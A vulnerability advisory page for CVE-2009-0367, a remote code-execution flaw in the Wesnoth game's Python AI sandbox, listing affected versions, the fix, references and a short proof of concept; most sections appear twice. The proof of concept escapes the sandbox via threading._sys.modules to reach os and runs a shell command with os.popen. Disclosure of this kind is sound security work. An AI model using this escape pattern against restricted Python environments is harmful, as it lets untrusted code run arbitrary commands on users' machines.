Wesnoth PythonAI Remote Code Execution Vulnerability
BID:33971
Info
Wesnoth PythonAI Remote Code Execution Vulnerability
| Bugtraq ID: | 33971 |
| Class: | Design Error |
| CVE: |
CVE-2009-0367 |
| Remote: | Yes |
| Local: | No |
| Published: | Feb 25 2009 12:00AM |
| Updated: | Mar 12 2009 06:06PM |
| Credit: | Wesnoth |
| Vulnerable: |
Wesnoth Wesnoth 1.2.8 Wesnoth Wesnoth 1.2.7 Wesnoth Wesnoth 1.2.6 Wesnoth Wesnoth 1.5 Wesnoth Wesnoth 1.4 Pardus Linux 2008 0 |
| Not Vulnerable: |
Wesnoth Wesnoth 1.5.11 |
Discussion
Wesnoth PythonAI Remote Code Execution Vulnerability
Wesnoth is prone to a remote code-execution vulnerability caused by a design error.
Attackers can exploit this issue to execute arbitrary Python code in the context of the user running the vulnerable application.
Versions prior to Wesnoth 1.5.11 are affected.
Wesnoth is prone to a remote code-execution vulnerability caused by a design error.
Attackers can exploit this issue to execute arbitrary Python code in the context of the user running the vulnerable application.
Versions prior to Wesnoth 1.5.11 are affected.
Exploit / POC
Wesnoth PythonAI Remote Code Execution Vulnerability
The following exploit code is available:
#!WPY
import threading
os = threading._sys.modules['os']
f = os.popen("firefox 'http://www.example.com'")
f.close()
The following exploit code is available:
#!WPY
import threading
os = threading._sys.modules['os']
f = os.popen("firefox 'http://www.example.com'")
f.close()
Solution / Fix
Wesnoth PythonAI Remote Code Execution Vulnerability
Solution:
The vendor has released fixes. Please see the references for more information.
Solution:
The vendor has released fixes. Please see the references for more information.
References
Wesnoth PythonAI Remote Code Execution Vulnerability
References:
References:
- bug #13048: Hole in Python AI sandbox permits arbitrary code execution (Wesnoth)
- Wesnoth Homepage (Wesnoth)
- Security advisor for 1.4.x (Wesnoth)